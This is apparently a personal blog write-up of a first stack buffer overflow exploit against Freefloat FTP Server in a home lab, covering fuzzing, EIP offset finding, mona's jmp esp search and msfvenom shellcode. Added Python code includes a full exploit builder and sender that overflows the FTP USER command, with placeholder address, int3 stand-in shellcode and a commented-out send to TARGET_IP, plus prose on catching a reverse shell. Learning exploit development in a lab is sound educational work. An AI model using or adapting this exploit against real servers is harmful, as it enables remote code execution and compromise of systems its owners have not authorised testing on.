Finally, after some hard work, I managed to understand and create my first buffer overflow. It has been amazing and really worth the learning. Of course, some people might say that this is really too old school, as there are different and more modern techniques to create and detect buffer overflows, but sometimes the basics are the best and all you need, as they still apply to modern software. If you ever need to learn anything new, it's always best to have a solid understanding of the basics so you know where to go after that.
Let's Start
I managed to follow tutorials from different blogs (I will put the links at the end) where they explain buffer overflows amazingly well and give you an insight into what they are and how they work.
A simple Wikipedia search says this:
In information security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer’s boundary and overwrites adjacent memory locations.
We will download the Freefloat FTP Server onto our debugging machine and attach it to Immunity Debugger.
(RDP Session)
We will write a simple fuzzer on our attacking machine (I used Python) and send a large number of characters so we can see where EIP gets overwritten. Once the fuzzer has been sent we can watch the result in Immunity Debugger: if EIP now holds bytes from our buffer, the function's saved return address on the stack was overwritten by our input.
(I used the pattern script from msfconsole to find the exact location where EIP gets overwritten, then the offset script from msfconsole to locate the exact offset.)
Once located, we can confirm the offset by editing our fuzzer to put four \x42 bytes ("B") at that position and checking whether they land in EIP.
We run it and check our debugger
Perfect, EIP gets overwritten with 42's.
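To show what the pattern and offset steps are actually doing, here is an added Python example (not from the original post or the referenced tutorials) that generates the same cyclic pattern Metasploit's pattern_create uses and computes the offset from the EIP value shown in the debugger, then builds the B-check buffer. The EIP value 0x37684136 and the 1000-byte length are illustrative inputs chosen for this example; substitute the value your debugger shows.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def cyclic_pattern(length):
    """Build a non-repeating pattern in the order Metasploit's pattern_create
    uses: every 3-byte chunk is (uppercase, lowercase, digit), so any 4-byte
    window is unique within the first 20280 bytes."""
    chunks = []
    for upper in UPPER:
        for lower in LOWER:
            for digit in DIGITS:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(eip_value, length=1000):
    """Given the 32-bit EIP value as the debugger displays it (e.g. 0x37684136),
    return the offset into the pattern at which those 4 bytes were sent.
    x86 is little-endian, so the bytes in memory are the reverse of the
    displayed hex: 0x37684136 was written as the bytes "6Ah7"."""
    chunk = struct.pack("<I", eip_value).decode("ascii")
    offset = cyclic_pattern(length).find(chunk)
    if offset < 0:
        raise ValueError("EIP value not found in a pattern of this length")
    return offset


def build_check_buffer(offset, total_len=1000):
    """Confirmation buffer: A's up to the offset, four B's (0x42) that must
    land in EIP, then C's to keep the total length unchanged."""
    return b"A" * offset + b"B" * 4 + b"C" * (total_len - offset - 4)


if __name__ == "__main__":
    # Illustrative value only; read the real one off EIP in Immunity Debugger.
    crashed_eip = 0x37684136
    off = pattern_offset(crashed_eip)
    print(f"offset to EIP: {off}")
    print(build_check_buffer(off)[off - 4:off + 8])
```

The offset counts from the first byte of the pattern, not from the start of the FTP command, so send the check buffer with exactly the same prefix (for example the command name and space) that the fuzzer used. If EIP does not show 42424242 afterwards, a prefix mismatch is the first thing to rule out.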
Once that is confirmed, we replace the B's with the address of an instruction that redirects execution to ESP (a jmp esp), because at the moment of the crash ESP points into the part of our buffer right after the return address, which has enough room to hold our shellcode. Neither that address nor the shellcode may contain bad characters; for an FTP command that typically means at least the null byte and the \x0d\x0a that terminates the command.
We open the Log window (View > Log) in the debugger and use the mona.py script to find a suitable pointer with this command:
!mona jmp -r esp
mona lists every jmp esp it finds. Pick one from a module that is not rebased and has no ASLR or SafeSEH protection, make sure its address contains no bad characters, and remember that the address has to be written into the exploit in little-endian order (bytes reversed).
We are almost done. We need to modify our POC a bit to add a variable for our shellcode and insert a payload of our choice. Our payload goes in the part of the buffer that is currently filled with C's (the bytes right after the return address, where ESP points). Ideally the padding length is calculated dynamically so we don't have to recalculate it when we insert a payload of a different size; the total buffer length should remain 1000 bytes. We also put some NOPs (No Operation Performed, \x90) in front of the payload as padding, so the jump does not have to land on the exact first byte of the shellcode. Any shellcode we put in the shellcode variable will then be executed by the overflow.
We will use msfvenom to generate our shell payload, telling it (with the -b option) to exclude the bad characters that would stop our shell from executing.
Our final result
We restart the program and start a handler to catch the connection coming back to us (I used msfconsole just for simplicity), and we can see that we got a shell back on our attacking machine.
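Putting the pieces together, here is an added Python example of the final exploit builder. It is not the original post's POC nor the referenced tutorial's code, and it makes the following assumptions: the offset to EIP is 230, the obviously fake 0x41424344 stands in for the jmp esp address mona reports, \x00\x0a\x0d are the bad characters, the crash is triggered through the USER command, and a block of \xcc (int3) bytes is used as constructed stand-in shellcode. The int3 block is a practical way to confirm execution reaches the payload, since the debugger breaks on it, before the msfvenom output is swapped in.

```python
import socket
import struct

TOTAL_LEN = 1000
OFFSET = 230                  # assumed: offset to EIP from the pattern/offset step
JMP_ESP = 0x41424344          # placeholder only: replace with a "jmp esp" address from mona
BADCHARS = b"\x00\x0a\x0d"    # assumed bad characters: NUL plus the CRLF that ends an FTP command
NOP_SLED = 16


def check_badchars(data, badchars=BADCHARS):
    """Return the offsets of every bad character in data (empty list means clean)."""
    return [i for i, b in enumerate(data) if b in badchars]


def build_exploit(shellcode, offset=OFFSET, jmp_esp=JMP_ESP,
                  total_len=TOTAL_LEN, nop_sled=NOP_SLED):
    """Layout: A * offset | jmp esp (little-endian) | NOP sled | shellcode | C padding.
    The padding is computed so the total stays at total_len bytes whatever the
    shellcode size, so nothing has to be recalculated by hand when the payload changes."""
    bad = check_badchars(shellcode)
    if bad:
        raise ValueError(f"shellcode has bad characters at offsets {bad}; regenerate with msfvenom -b")
    ret = struct.pack("<I", jmp_esp)          # reversed byte order so EIP receives the address
    if check_badchars(ret):
        raise ValueError("jmp esp address contains a bad character; choose another pointer")
    payload = b"\x90" * nop_sled + shellcode  # NOPs so the jump need not hit byte 0 of the shellcode
    padding = total_len - offset - len(ret) - len(payload)
    if padding < 0:
        raise ValueError(f"payload is {-padding} bytes too large for the buffer")
    buf = b"A" * offset + ret + payload + b"C" * padding
    assert len(buf) == total_len
    return buf


def send_exploit(host, buf, port=21):
    """Deliver the buffer as the argument of the USER command (assumed trigger)."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)                          # read the banner first
        s.sendall(b"USER " + buf + b"\r\n")


if __name__ == "__main__":
    # Constructed stand-in shellcode: int3 breakpoints. Replace with msfvenom output
    # generated with -b "\x00\x0a\x0d" once the debugger confirms we land here.
    shellcode = b"\xcc" * 32
    exploit = build_exploit(shellcode)
    print(f"buffer length {len(exploit)}, return address at offset {OFFSET}")
    # send_exploit("TARGET_IP", exploit)   # fill in the debugging machine's IP to fire it
```

Before trusting the layout, check in the debugger that ESP really points at the bytes just after the return address at the moment of the crash; if it points somewhere else in the buffer, the NOP sled and shellcode have to move to that spot instead.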
References:
https://www.fuzzysecurity.com/tutorials/expDev/2.html
https://en.wikipedia.org/wiki/Buffer_overflow